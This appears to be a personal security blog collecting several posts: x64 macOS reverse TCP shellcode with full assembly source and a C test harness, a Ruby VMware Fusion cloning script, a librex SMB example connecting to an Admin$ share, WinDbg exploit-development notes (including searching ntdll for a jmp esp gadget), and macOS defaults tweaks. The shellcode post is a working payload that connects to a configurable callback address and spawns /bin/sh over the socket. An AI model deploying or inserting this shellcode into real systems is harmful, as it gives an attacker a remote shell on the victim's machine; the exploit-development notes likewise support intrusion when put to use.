hammackj

OSX x64 Reverse TCP Shellcode

I noticed there wasn't any reverse tcp shellcode for x64 OSX. In fact there is almost no 64 bit shellcode for OSX. The only code I could find was here. This guys two blog posts about 64 bit asm on OSX really helped me on this. I am told it works great on 64 bit or 32 bit kernels. This is my first attempt at writing my own shellcode, so I am sure there are a few optimization that can be done.

Shellcode

#OSX reverse tcp shell (131 bytes)
#replace FFFFFFFF around byte 43 with the call back ip in hex
#replace 5C11 around byte 39 with a new port current is 4444
shellcode =
"\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48" +
"\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F" +
"\x05\x49\x89\xC4\x49\xBD\x01\x01\x11\x5C\xFF\xFF\xFF\xFF\x41" +
"\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89" +
"\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83" +
"\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83" +
"\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48" +
"\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED" +
"\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05"

Source

;osx x64 reverse tcp shellcode (131 bytes)
;Jacob Hammack
;jacob.hammack@hammackj.com
;http://www.hammackj.com
;
;props to http://www.thexploit.com/ for the blog posts on x64 osx asm
;I borrowed some of his code
;
;nasm -f macho reverse_tcp.s -o reverse_tcp.o
;ld -o reverse_tcp -e start reverse_tcp.o

BITS 64

section .text
global start

start:
    mov r8b, 0x02               ; unix class system calls = 2
    shl r8, 24                  ; shift left 24 to the upper order bits
    or r8, 0x61                 ; socket is 0x61
    mov rax, r8                 ; put socket syscall # into rax

;Socket
    xor rdx, rdx                ; zero out rdx
    mov rsi, rdx                ; AF_NET = 1
    inc rsi                     ; rsi = AF_NET
    mov rdi, rsi                ; SOCK_STREAM = 2
    inc rdi                     ; rdi = SOCK_STREAM
    syscall                     ; call socket(SOCK_STREAM, AF_NET, 0);

    mov r12, rax                ; Save the socket

;Sock_addr
    mov r13, 0xFFFFFFFF5C110101 ; IP = FFFFFFFF, Port = 5C11(4444)
    mov r9b, 0xFF               ; The sock_addr_in is + FF from where we need it
    sub r13, r9                 ; So we sub 0xFF from it to get the correct value and avoid a null
    push r13                    ; Push it on the stack
    mov r13, rsp                ; Save the sock_addr_in into r13


;Connect
    inc r8                      ; Connect = 0x62, so we inc by one from the previous syscall
    mov rax, r8                 ; move that into rax
    mov rdi, r12                ; move the saved socket fd into rdi
    mov rsi, r13                ; move the saved sock_addr_in into rsi
    add rdx, 0x10               ; add 0x10 to rdx
    syscall                     ; call connect(rdi, rsi, rdx)

    sub r8, 0x8                 ; subtract 8 from r8 for the next syscall dup2 0x90
    xor rsi, rsi                ; zero out rsi

dup:
    mov rax, r8                 ; move the syscall for dup2 into rax
    mov rdi, r12                ; move the FD for the socket into rdi
    syscall                     ; call dup2(rdi, rsi)

    cmp rsi, 0x2                ; check to see if we are still under 2
    inc rsi                     ; inc rsi
    jbe dup                     ; jmp if less than 2

    sub r8, 0x1F                ; setup the exec syscall at 0x3b
    mov rax, r8                 ; move the syscall into rax

;exec
    xor rdx, rdx                ; zero out rdx
    mov r13, 0x68732f6e69622fFF ; '/bin/sh' in hex
    shr r13, 8                  ; shift right to create the null terminator
    push r13                    ; push to the stack
    mov rdi, rsp                ; move the command from the stack to rdi
    xor rsi, rsi                ; zero out rsi
    syscall                     ; call exec(rdi, 0, 0)

Testing it

//Jacob Hammack
//Shellcode executor template from: http://www.thexploit.com/sploitdev/testing-your-shellcode-on-a-non-executable-stack-or-heap/

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
 
int (*sc)();
 
char shellcode[] = "Put your modified shellcode here";

int main(int argc, char **argv) 
{
  void *ptr = mmap(0, 
    strlen(shellcode), 
    PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, 
    -1, 
    0);

  if (ptr == MAP_FAILED) 
  {
    perror("mmap");
    exit(-1);
  }

  memcpy(ptr, shellcode, sizeof(shellcode));
  sc = ptr;

  sc();

  return 0;
}

VMWare Fusion VM Clone Script

This is a fairly simple VMWare VM cloning script. I use VMWare Fusion/ESXi for most of my research and neither of these tools have a cloning functionality without paying for it. VMWare Workstation has a built-in function and Fusion is missing that function currently, hopefully they will add it in 4.0. Attached is a really simple proof of concept script for cloning virtual machines. I created a github repo for the script here. I have tested it locally on about 20 different VM's that I have but nothing beats having other people test it. Please let me know if there are any issues.

#!/usr/bin/env ruby -wKU

#Jacob Hamack
#jacob.hammack@hammackj.com
#http://www.hammackj.com
#Usage: clone_vm.rb original/ clone/

def rename_files_by_type (type, old_vm_name, new_vm_name)
    file_of_type = Dir["*.#{type}"]

    file_of_type.each do |old_file_name|
        new_file_name = old_file_name.sub(old_vm_name, new_vm_name)

        if old_file_name == new_file_name
            next
        else
            File.rename(old_file_name, new_file_name)
        end
    end
end

def file_type(file)
    type = `file '#{file}'`.split(":")[1]
end

def process_vmdk_files(old_vm_name, new_vm_name)
    vmdk_files = Dir["*.vmdk"]

    vmdk_files.each do |file|
        type = file_type file
        new_file_name = file.sub(old_vm_name, new_vm_name)

        if type =~ /ASCII English text/                            
            File.open("#{new_file_name}", "w+") do |output|
                File.open("#{file}", "r") do |input|
                    while (line = input.gets)
                        if line =~ /\"#{old_vm_name}-s\d\d\d.vmdk\"/
                            line = line.sub(old_vm_name, new_vm_name)
                        elsif line =~ /\"#{old_vm_name}-\d*-s\d\d\d.vmdk\"/
                            line = line.sub(old_vm_name, new_vm_name)
                        elsif line =~ /parentFileNameHint/
                            line = line.sub(old_vm_name, new_vm_name)
                        else
                            line = line
                        end

                        output.write line
                    end
                end
            end

            system("rm '#{file}'")

        elsif type =~ /VMware4 disk image/
            File.rename(file, new_file_name)
        else
            puts "[!] Broken vmdk: #{file}"
        end
    end
end

def process_vmx_file(old_vm_name, new_vm_name)
    File.open("#{new_vm_name}.vmx", "w+") do |output|
        File.open("#{old_vm_name}.vmx", "r") do |input|
            while (line = input.gets)       
                if line =~ /scsi0:0.fileName/
                    line = line.gsub("#{old_vm_name}", "#{new_vm_name}")
                elsif line =~ /displayName/
                    line = line.gsub("#{old_vm_name}", "#{new_vm_name}")
                elsif line =~ /extendedConfigFile/
                    line = line.gsub("#{old_vm_name}.vmxf", "#{new_vm_name}.vmxf")
                elsif line =~ /nvram/
                    line = ""
                elsif line =~ /sched.swap.derivedName/
                    line = line.gsub("#{old_vm_name}", "#{new_vm_name}")
                elsif line =~ /checkpoint.vmState/
                    line = line.gsub("#{old_vm_name}", "#{new_vm_name}")
                else
                    line = line
                end

                output.write line
            end
        end
    end
    system("rm '#{old_vm_name}.vmx'")
end

def process_vmxf_file(old_vm_name, new_vm_name)
    File.open("#{new_vm_name}.vmxf", "w+") do |output|
        File.open("#{old_vm_name}.vmxf", "r") do |input|
            while (line = input.gets)
                if line =~ /vmxPathName/
                    line = line.gsub("#{old_vm_name}.vmx", "#{new_vm_name}.vmx")
                else
                    line = line
                end

                output.write line
            end
        end
    end

    system("rm '#{old_vm_name}.vmxf'")
end

def process_vmsd_file(old_vm_name, new_vm_name)
    File.open("#{new_vm_name}.vmsd", "w+") do |output|
        File.open("#{old_vm_name}.vmsd", "r") do |input|
            while (line = input.gets)       
                if line =~ /fileName/ or line =~ /filename/
                    line = line.sub("#{old_vm_name}", "#{new_vm_name}")
                else
                    line = line
                end

                output.write line
            end
        end
    end
    system("rm '#{old_vm_name}.vmsd'")
end


file = ARGV[0]
newfile = ARGV[1]

if file[-1] == "/"
    file = file[0...file.rindex('/')]
end

if newfile[-1] == "/"
    newfile = newfile[0...newfile.rindex('/')]
end

#1. Copy existing vm to new path
puts "[*] Cloning #{file} to #{newfile}"
system("cp -r '#{file}'/ '#{newfile}'/")

#clean up the new vm
puts "[*] Clean #{newfile}"
Dir.chdir("#{newfile}/")

file = file.gsub(".vmwarevm", "")
newfile = newfile.gsub(".vmwarevm", "")

#Remove all of the pointless stuff
system("rm *.nvram")
system("rm -rf *.lck")
system("rm -rf Applications/")
system("rm -rf appListCache")
system("rm *.log")
system("rm quicklook-cache.png")

puts "[*] Fixing disk references"
process_vmdk_files(file, newfile)

puts "[*] Fixing #{newfile}.vmx"
process_vmx_file(file, newfile)

puts "[*] Fixing #{newfile}.vmxf"
process_vmxf_file(file, newfile)

puts "[*] Fixing Snapshots"
puts "[*] Fixing *.vmem"
rename_files_by_type("vmem", file, newfile)

puts "[*] Fixing *.vmsn"
rename_files_by_type("vmsn", file, newfile)

puts "[*] Fixing *.vmss"
rename_files_by_type("vmss", file, newfile)

puts "[*] Fixing vmsd"
process_vmsd_file(file, newfile)

Using the librex gem

I started automating the release of the librex gem and I thought it might be useful if I did a quick post on how to use the library.

So for starters librex is a repackaging of a core library from Metasploit. At my last job, I needed a way to interact with Windows shares and other rpc functionality from ruby. Rex was the only implementation of SMB in ruby that I could find. With permission from HDM I created a gem and published it on rubygems.

This is a quick example of how to interact with a Windows Share/computer using SMB via the Rex library.

#!/usr/bin/env ruby

#Jacob Hammack
#Jacob.Hammack@hammackj.com
#An Example for connecting to a Windows Share.

require 'rubygems'
require 'rex'

host = ""
username = ""
password = ""
#hostname is interesting, new windows require the actual hostname of the box
#to connect so this may not work on 7
hostname = "*SMBSERVER"
domain = ""

begin
    sock = Rex::Socket::Tcp.create('PeerHost' => host, 'PeerPort' => 139)
    smb = Rex::Proto::SMB::SimpleClient.new(sock)

    puts "[*] Logging in to #{host}"
    smb.login(hostname, username, password, domain)
    smb.connect("Admin$")

    if smb.client.auth_user
        puts "[*] Connected to Admin$"
    else
        puts "[!] Unable to Connect to Admin$"
    end

    sock.close
rescue Exception => e
    puts "#{e.messaage}\n#{e.backtrace}\n\n"
end

If there are any requests I will do more examples for the different stuff Rex can do for you. For now back to the debugger =)

Using WinDbg for Exploit Development Notes

The following are some notes that I found useful when using windbg for exploit development.

Setting up the symbols!

0:001> .sympath SRV*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*http://msdl.microsoft.com/download/symbols
0:011> .reload
Reloading current modules
..................................................................

Basic Commands

0:001> g *Continue execution
0:001> !peb *Displays the process executation block
PEB at 7FFDF000
    InheritedAddressSpace:    No
    ReadImageFileExecOptions: No
    BeingDebugged:            Yes
    ImageBaseAddress:         01000000
    Ldr.Initialized: Yes
    Ldr.InInitializationOrderModuleList: 71f40 . 99b60
    Ldr.InLoadOrderModuleList: 71ec0 . 99b50
    Ldr.InMemoryOrderModuleList: 71ec8 . 99b58
            Base TimeStamp                     Module
         1000000 424df423 Apr 01 19:23:47 2005 C:\WINNT\system32\spoolsv.exe
        77f80000 41e648e0 Jan 13 04:09:36 2005 C:\WINNT\system32\ntdll.dll
        7c2d0000 42675f8a Apr 21 03:08:42 2005 C:\WINNT\system32\ADVAPI32.dll
        7c570000 41dd0235 Jan 06 03:17:41 2005 C:\WINNT\system32\KERNEL32.dll
        77d30000 425670f4 Apr 08 06:54:28 2005 C:\WINNT\system32\RPCRT4.dll
        78000000 3e6e3115 Mar 11 12:55:17 2003 C:\WINNT\system32\MSVCRT.dll
        77f40000 425670f4 Apr 08 06:54:28 2005 C:\WINNT\system32\GDI32.dll
        77e10000 42675f89 Apr 21 03:08:41 2005 C:\WINNT\system32\USER32.dll
        76a90000 425670f7 Apr 08 06:54:31 2005 C:\WINNT\system32\SPOOLSS.DLL
        77340000 3ef274de Jun 19 21:43:42 2003 C:\WINNT\system32\iphlpapi.dll
        75030000 3ef27506 Jun 19 21:44:22 2003 C:\WINNT\system32\WS2_32.DLL
        75020000 3843995d Nov 30 03:31:09 1999 C:\WINNT\system32\WS2HELP.DLL
        77520000 3844d039 Dec 01 01:37:29 1999 C:\WINNT\system32\ICMP.DLL
        77320000 3844d039 Dec 01 01:37:29 1999 C:\WINNT\system32\MPRAPI.DLL
        75150000 425670fb Apr 08 06:54:35 2005 C:\WINNT\system32\SAMLIB.DLL
        7cdc0000 42675f8c Apr 21 03:08:44 2005 C:\WINNT\system32\NETAPI32.DLL
        77980000 41e648e2 Jan 13 04:09:38 2005 C:\WINNT\system32\DNSAPI.dll
        75050000 3ef27506 Jun 19 21:44:22 2003 C:\WINNT\system32\WSOCK32.dll
        751c0000 3843995b Nov 30 03:31:07 1999 C:\WINNT\system32\NETRAP.dll
        77bf0000 3ef274dd Jun 19 21:43:41 2003 C:\WINNT\system32\NTDSAPI.dll
        77950000 425670f5 Apr 08 06:54:29 2005 C:\WINNT\system32\WLDAP32.DLL
        7c340000 3ef274dd Jun 19 21:43:41 2003 C:\WINNT\system32\SECUR32.DLL
        7ce20000 42675f8a Apr 21 03:08:42 2005 C:\WINNT\system32\OLE32.DLL
        779b0000 3ef274dd Jun 19 21:43:41 2003 C:\WINNT\system32\OLEAUT32.DLL
        773b0000 3ef274de Jun 19 21:43:42 2003 C:\WINNT\system32\ACTIVEDS.DLL
        77380000 425670f6 Apr 08 06:54:30 2005 C:\WINNT\system32\ADSLDPC.DLL
        77830000 3844d037 Dec 01 01:37:27 1999 C:\WINNT\system32\RTUTILS.DLL
        77880000 3ef274dd Jun 19 21:43:41 2003 C:\WINNT\system32\SETUPAPI.DLL
        7c0f0000 425670f4 Apr 08 06:54:28 2005 C:\WINNT\system32\USERENV.DLL
        774e0000 425670f6 Apr 08 06:54:30 2005 C:\WINNT\system32\RASAPI32.DLL
        774c0000 425670f6 Apr 08 06:54:30 2005 C:\WINNT\system32\rasman.dll
        77530000 3ef274de Jun 19 21:43:42 2003 C:\WINNT\system32\TAPI32.dll
        77b50000 3ef274dd Jun 19 21:43:41 2003 C:\WINNT\system32\COMCTL32.DLL
        77c70000 4214cf23 Feb 17 11:06:43 2005 C:\WINNT\system32\SHLWAPI.DLL
        77360000 3ef274de Jun 19 21:43:42 2003 C:\WINNT\system32\DHCPCSVC.DLL
        777f0000 3844d037 Dec 01 01:37:27 1999 C:\WINNT\system32\rasadhlp.dll
        76120000 425670f7 Apr 08 06:54:31 2005 C:\WINNT\system32\localspl.dll
        76980000 3ef274e0 Jun 19 21:43:44 2003 C:\WINNT\system32\sfc.dll
        68010000 42565e41 Apr 08 05:34:41 2005 C:\WINNT\system32\sfcfiles.dll
        77820000 3ef274dd Jun 19 21:43:41 2003 C:\WINNT\system32\VERSION.dll
        759b0000 3ef274e2 Jun 19 21:43:46 2003 C:\WINNT\system32\LZ32.DLL
        77800000 3ef274dd Jun 19 21:43:41 2003 C:\WINNT\system32\winspool.drv
        76620000 425670fa Apr 08 06:54:34 2005 C:\WINNT\system32\MPR.DLL
        733e0000 3843997b Nov 30 03:31:39 1999 C:\WINNT\system32\cnbjmon.dll
        76ab0000 3844d03e Dec 01 01:37:34 1999 C:\WINNT\system32\pjlmon.dll
        76a80000 3ef274df Jun 19 21:43:43 2003 C:\WINNT\system32\tcpmon.dll
        10000000 4ae861e6 Oct 28 09:23:18 2009 C:\WINNT\system32\TPVMMon.dll
        7cf30000 42675f8a Apr 21 03:08:42 2005 C:\WINNT\system32\SHELL32.dll
          db0000 4a1e99c7 May 28 09:03:51 2009 C:\WINNT\system32\TPVMW32.dll
          e00000 4acf07bc Oct 09 04:51:56 2009 C:\WINNT\system32\TPRDPW32.dll
        655e0000 38470103 Dec 02 17:30:11 1999 C:\WINNT\system32\WTSAPI32.dll
        66640000 3ef27504 Jun 19 21:44:20 2003 C:\WINNT\system32\UTILDLL.dll
        65780000 3ef27506 Jun 19 21:44:22 2003 C:\WINNT\system32\WINSTA.dll
        68a80000 3ef274fe Jun 19 21:44:14 2003 C:\WINNT\system32\REGAPI.dll
        76a70000 3ef274df Jun 19 21:43:43 2003 C:\WINNT\system32\usbmon.dll
          e60000 49d4afde Apr 02 06:30:22 2009 C:\WINNT\system32\spool\PRTPROCS\W32X86\TPWinPrn.dll
        73930000 3ef274e8 Jun 19 21:43:52 2003 C:\WINNT\system32\CLUSAPI.dll
        689d0000 3ef274fe Jun 19 21:44:14 2003 C:\WINNT\system32\RESUTILS.dll
        782c0000 3ef274dd Jun 19 21:43:41 2003 C:\WINNT\System32\rnr20.dll
        777e0000 3844d037 Dec 01 01:37:27 1999 C:\WINNT\System32\winrnr.dll
        74fd0000 3ef274f6 Jun 19 21:44:06 2003 C:\WINNT\system32\msafd.dll
        75010000 3ef27506 Jun 19 21:44:22 2003 C:\WINNT\System32\wshtcpip.dll
        76a50000 3ef274df Jun 19 21:43:43 2003 C:\WINNT\system32\win32spl.dll
        7c950000 41e651f8 Jan 13 04:48:24 2005 C:\WINNT\system32\CLBCATQ.DLL
        76b00000 3ef274df Jun 19 21:43:43 2003 C:\WINNT\system32\inetpp.dll
        7e660000 4802a101 Apr 13 19:10:41 2008 C:\WINNT\system32\spool\DRIVERS\W32X86\3\PS5UI.DLL
        SubSystemData:     0
        ProcessHeap:       70000
        ProcessParameters: 20000
        WindowTitle:  'C:\WINNT\system32\spoolsv.exe'
        ImageFile:    'C:\WINNT\system32\spoolsv.exe'
        CommandLine:  'C:\WINNT\system32\spoolsv.exe'
        DllPath:      'C:\WINNT\system32;.;C:\WINNT\system32;C:\WINNT\system;C:\WINNT;C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem'
        Environment:  0x10000

Dumping Binary Data

0:001> db eip
7c90120e  cc c3 8b ff cc c3 8b ff-8b 44 24 04 cc c2 04 00  .........D$.....
7c90121e  64 a1 18 00 00 00 c3 57-8b 7c 24 0c 8b 54 24 08  d......W.|$..T$.
7c90122e  c7 02 00 00 00 00 89 7a-04 0b ff 74 1e 83 c9 ff  .......z...t....
7c90123e  33 c0 f2 ae f7 d1 81 f9-ff ff 00 00 76 05 b9 ff  3...........v...
7c90124e  ff 00 00 66 89 4a 02 49-66 89 0a 5f c2 08 00 57  ...f.J.If.._...W
7c90125e  8b 7c 24 0c 8b 54 24 08-c7 02 00 00 00 00 89 7a  .|$..T$........z
7c90126e  04 0b ff 74 1e 83 c9 ff-33 c0 f2 ae f7 d1 81 f9  ...t....3.......
7c90127e  ff ff 00 00 76 05 b9 ff-ff 00 00 66 89 4a 02 49  ....v......f.J.I

Disassembling Instructions

0:001> u eip
ntdll!DbgBreakPoint:
7c90120e cc              int     3
7c90120f c3              ret
7c901210 8bff            mov     edi,edi
ntdll!DbgUserBreakPoint:
7c901212 cc              int     3
7c901213 c3              ret
7c901214 8bff            mov     edi,edi
7c901216 8b442404        mov     eax,dword ptr [esp+4]
7c90121a cc              int     3

Listing Loaded Modules

0:018> lmf
start    end        module name
00930000 00947000   odbcint  C:\WINDOWS\system32\odbcint.dll
01000000 01081000   winlogon C:\WINDOWS\system32\winlogon.exe
01360000 0139c000   WgaLogon C:\WINDOWS\system32\WgaLogon.dll
01c70000 01f35000   xpsp2res C:\WINDOWS\system32\xpsp2res.dll
47020000 47028000   dimsntfy C:\WINDOWS\System32\dimsntfy.dll
5ad70000 5ada8000   uxtheme  C:\WINDOWS\system32\uxtheme.dll
5b860000 5b8b5000   NETAPI32 C:\WINDOWS\system32\NETAPI32.dll
5d090000 5d12a000   COMCTL32 C:\WINDOWS\system32\COMCTL32.dll
68000000 68036000   rsaenh   C:\WINDOWS\system32\rsaenh.dll
71aa0000 71aa8000   WS2HELP  C:\WINDOWS\system32\WS2HELP.dll
71ab0000 71ac7000   WS2_32   C:\WINDOWS\system32\WS2_32.dll
71b20000 71b32000   MPR      C:\WINDOWS\system32\MPR.dll
71bf0000 71c03000   SAMLIB   C:\WINDOWS\system32\SAMLIB.dll
723d0000 723ec000   WINSCARD C:\WINDOWS\system32\WINSCARD.DLL
72d10000 72d18000   msacm32  C:\WINDOWS\system32\msacm32.drv
72d20000 72d29000   wdmaud   C:\WINDOWS\system32\wdmaud.drv
73000000 73026000   WINSPOOL C:\WINDOWS\system32\WINSPOOL.DRV
74320000 7435d000   ODBC32   C:\WINDOWS\system32\ODBC32.dll
755c0000 755ee000   msctfime C:\WINDOWS\system32\msctfime.ime
75930000 7593a000   PROFMAP  C:\WINDOWS\system32\PROFMAP.dll
75940000 75948000   NDdeApi  C:\WINDOWS\system32\NDdeApi.dll
75950000 7596a000   WlNotify C:\WINDOWS\system32\WlNotify.dll
75970000 75a68000   MSGINA   C:\WINDOWS\system32\MSGINA.dll
76360000 76370000   WINSTA   C:\WINDOWS\system32\WINSTA.dll
76390000 763ad000   IMM32    C:\WINDOWS\system32\IMM32.DLL
763b0000 763f9000   comdlg32 C:\WINDOWS\system32\comdlg32.dll
76600000 7661d000   cscdll   C:\WINDOWS\system32\cscdll.dll
76790000 7679c000   cryptdll C:\WINDOWS\system32\cryptdll.dll
769c0000 76a74000   USERENV  C:\WINDOWS\system32\USERENV.dll
76b40000 76b6d000   WINMM    C:\WINDOWS\system32\WINMM.dll
76bb0000 76bb5000   sfc      C:\WINDOWS\system32\sfc.dll
76bc0000 76bcf000   REGAPI   C:\WINDOWS\system32\REGAPI.dll
76bf0000 76bfb000   PSAPI    C:\WINDOWS\system32\PSAPI.DLL
76c30000 76c5e000   WINTRUST C:\WINDOWS\system32\WINTRUST.dll
76c60000 76c8a000   sfc_os   C:\WINDOWS\system32\sfc_os.dll
76c90000 76cb8000   IMAGEHLP C:\WINDOWS\system32\IMAGEHLP.dll
76d60000 76d79000   iphlpapi C:\WINDOWS\system32\iphlpapi.dll
76f50000 76f58000   WTSAPI32 C:\WINDOWS\system32\WTSAPI32.dll
76f60000 76f8c000   WLDAP32  C:\WINDOWS\system32\WLDAP32.dll
76fd0000 7704f000   CLBCATQ  C:\WINDOWS\system32\CLBCATQ.DLL
77050000 77115000   COMRes   C:\WINDOWS\system32\COMRes.dll
77120000 771ab000   OLEAUT32 C:\WINDOWS\system32\OLEAUT32.dll
773d0000 774d3000   comctl32_773d0000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
774e0000 7761d000   ole32    C:\WINDOWS\system32\ole32.dll
77690000 776b1000   NTMARTA  C:\WINDOWS\system32\NTMARTA.DLL
776c0000 776d2000   AUTHZ    C:\WINDOWS\system32\AUTHZ.dll
776e0000 77703000   SHSVCS   C:\WINDOWS\system32\SHSVCS.dll
77920000 77a13000   SETUPAPI C:\WINDOWS\system32\SETUPAPI.dll
77a20000 77a74000   cscui    C:\WINDOWS\system32\cscui.dll
77a80000 77b15000   CRYPT32  C:\WINDOWS\system32\CRYPT32.dll
77b20000 77b32000   MSASN1   C:\WINDOWS\system32\MSASN1.dll
77b40000 77b62000   Apphelp  C:\WINDOWS\system32\Apphelp.dll
77bd0000 77bd7000   midimap  C:\WINDOWS\system32\midimap.dll
77be0000 77bf5000   MSACM32_77be0000 C:\WINDOWS\system32\MSACM32.dll
77c00000 77c08000   VERSION  C:\WINDOWS\system32\VERSION.dll
77c10000 77c68000   msvcrt   C:\WINDOWS\system32\msvcrt.dll
77c70000 77c95000   msv1_0   C:\WINDOWS\system32\msv1_0.dll
77dd0000 77e6b000   ADVAPI32 C:\WINDOWS\system32\ADVAPI32.dll
77e70000 77f02000   RPCRT4   C:\WINDOWS\system32\RPCRT4.dll
77f10000 77f59000   GDI32    C:\WINDOWS\system32\GDI32.dll
77f60000 77fd6000   SHLWAPI  C:\WINDOWS\system32\SHLWAPI.dll
77fe0000 77ff1000   Secur32  C:\WINDOWS\system32\Secur32.dll
7c800000 7c8f6000   kernel32 C:\WINDOWS\system32\kernel32.dll
7c900000 7c9b2000   ntdll    C:\WINDOWS\system32\ntdll.dll
7c9c0000 7d1d7000   SHELL32  C:\WINDOWS\system32\SHELL32.dll
7e410000 7e4a1000   USER32   C:\WINDOWS\system32\USER32.dll
7e720000 7e7d0000   sxs      C:\WINDOWS\system32\sxs.dll

Unloaded modules:
74980000 74aa3000   msxml3.dll
77710000 77754000   ES.DLL
72d20000 72d29000   wdmaud.drv
66700000 6688d000   sfcfiles.dll
71e50000 71e65000   msapsspc.dll
78080000 78091000   MSVCRT40.dll
767f0000 76818000   schannel.dll
75b00000 75b15000   digest.dll
747b0000 747f7000   msnsspc.dll
78080000 78091000   MSVCRT40.dll
74980000 74aa3000   msxml3.dll
5fff0000 5fff4000   KBDUS.DLL
74ad0000 74ad8000   powrprof.dll
4bfb0000 4bfcc000   dpcdll.dll
74980000 74aa3000   msxml3.dll
4bfb0000 4bfcc000   dpcdll.dll

Searching Memory

0:018> s 7c900000 7c9b2000 FF E4
7c96bf33  ff e4 be 96 7c fd be 96-7c 00 00 00 00 53 69 7a  ....|...|....Siz

0:018> u 7c96bf33
ntdll!`string'+0xa9:
7c96bf33 ffe4            jmp     esp
7c96bf35 be967cfdbe      mov     esi,0BEFD7C96h
7c96bf3a 96              xchg    eax,esi
7c96bf3b 7c00            jl      ntdll!RtlpDphFreeDelayedBlocksFromHeap+0xad (7c96bf3d)
7c96bf3d 0000            add     byte ptr [eax],al
7c96bf3f 005369          add     byte ptr [ebx+69h],dl
7c96bf42 7a65            jp      ntdll!RtlpDphFreeDelayedBlocksFromHeap+0x119 (7c96bfa9)
7c96bf44 207265          and     byte ptr [edx+65h],dh

Awesome Plugins

Byakugan

Byakugan is a plugin a part of Metasploit. The following examples are taken from the Byakugan slides in the reference section below. To load Byakugan type:

0:001> !load C:\path\to\byakugan.dll

Usage

0:001> !jutsu

0:001> !jutsu identBuf MyBufName CONTENTS

0:001> !jutsu identBuf msfpattern 500

0:001> !justsu listBuf

0:001> !jutsu rmbuf MyBufName

0:001> !jutsu hunt

0:001> !jutsu findReturn

0:001> !tenketsu

0:001> !tenketsu listHeaps

0:001> !tenketsu listChunks

!Exploitable Crash Analyzer

!exploitable is created by Microsoft and freely available. To load !exploitable type:

0:001> !load c:\path\to\msec.dll

Usage

Using !exploitable is really easy, when you have a first chance exception just type:

(19ec.468): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=00000101 edx=ffffffff esi=00000000 edi=00000000
eip=77f9193c esp=0132ffa8 ebp=0132ffb4 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000286
ntdll!DbgBreakPoint:
77f9193c cc              int     3
0:006> g
(19ec.1a0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=00000113 ecx=00000001 edx=00000000 esi=7c57edd2 edi=007f46bc
eip=41414141 esp=0098fd88 ebp=0098fde0 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
41414141 ??              ???
0:001> !load msec.dll
0:001> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at
Unknown Symbol @ 0x0000000041414141 called from KERNEL32!BaseThreadStart+0x0000000000000052 (Hash=0x264d5172.0x5a5e1f77)

Access violations at the instruction pointer are exploitable if not near NULL.

References

Interesting Mac OX Tweaks

A few tweaks for changing OSX 10.7ish, most of these will not work on 10.8+.

Verbose booting

   % sudo nvram boot-args="-v"

Credit: OSXDaily.com

Prevent .DS_Store on networked drives

   % defaults write com.apple.desktopservices DSDontWriteNetworkStores true

Credit : MacOSXHints.com

Get rid of the 3d dock

   % defaults write com.apple.dock no-glass -boolean YES; killall Dock

Credit: MacOSXHints.com

Disable dashboard

   % defaults write com.apple.dashboard mcx-disabled -boolean YES; killall Dock

Credit: MacWorld.com

Safari debug menu

   % defaults write com.apple.safari IncludeDebugMenu 1

Credit: MacOSXTips.com

I found a ton more on OSXNotes.com, check it out there are some really interesting changes that can be made.